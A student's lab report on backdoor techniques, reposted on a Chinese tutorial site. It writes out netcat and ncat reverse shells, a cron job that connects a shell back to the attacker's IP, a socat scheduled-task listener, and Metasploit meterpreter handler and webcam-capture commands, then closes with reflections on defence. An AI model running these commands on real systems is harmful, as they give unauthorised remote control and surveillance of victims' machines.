大佬教程收集整理的这篇文章主要介绍了2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践,大佬教程大佬觉得挺不错的,现在分享给大家,也给大家做个参考。
Kali地址:192.168.153.134
Win10地址:169.254.0.178
保证能ping通:
关闭防火墙和杀毒软件
ncat.exe -l -p 5237
nc 192.168.153.134 -e /bin/sh
反弹连接Windows主机的 5237 端口
攻击成功:Win10成功获得Kali操作sHell,能够进行操作
相同道理:在Linux中监听5237端口
在Windows输入指令
ncat.exe -e cmd.exe 192.168.153.134 5237
反弹连接Linux的5237端口
cron是linux下用来周期性的执行某种任务或等待处理某些事件的一个守护进程,与windows下的计划任务类似,当安装完成操作系统后,默认会安装此服务 工具,并且会自动启动cron进程,cron进程每分钟会定期检查是否有要执行的任务,如果有要执行的任务,则自动执行该任务。
用 crontab -e 指令编辑定时任务,选择3
vim编辑器中用 i 改为插入模式,在最后一行插入 50 19 23 3 * /bin/netcat 192.168.153.134 5237 -e /bin/sh 后输入 :wq! 保存并@L_673_14@
成功显示ls:
同时创建新操作,在操作->程序或脚本中选择 socat.exe 文件的路径,在@L_262_20@参数一栏填写 tcp-listen:5237 exec:cmd.exe,pty,stderr
按快捷键win+L即能锁定计算机,创建的任务开始运行。
use exploit/multi/handler /*进入handler模式*/ set payload windows/meterpreter/reverse_tcp /*对应生成的后门程序设置payload*/ show options /*查看当前信息状态*/ set LHOST 192.168.153.134 /*设置LHOST,其中ip为Linux的iP*/ set LPORT 5237 /*设置LPORT*/ exploit /*启动监听*/
webcam_snap / webcam_stream
getuid get system
感想:这次实验,不得不说很让我震惊。这是我第一次实际上get到后门获取信息的知识,很满足。希望以后能够更深入的学到相关理论和知识,不仅学会攻击,也要学会防范。
例举你能想到的一个后门进入到你系统中的可能方式?
答:
答:在下载软件的时候,可能会有捆绑垃圾下载下来,然后修改开机的启动项,当攻击者输入命令时,本机可能会自动响应。
答:我觉得最深刻的就是录像和音频的获取(这不就是黑客监视么!!)我已经将笔记本的摄像头贴起来了。
答:360安全卫士或许是个很好的选择;不过如果真正想要发现后门程序,我觉得要用抓包技术来分析信息。
以上是大佬教程为你收集整理的2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践全部内容,希望文章能够帮你解决2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践所遇到的程序开发问题。
如果觉得大佬教程网站内容还不错,欢迎将大佬教程推荐给程序员好友。
本图文内容来源于网友网络收集整理提供,作为学习参考使用,版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ:384754419,请注明来意。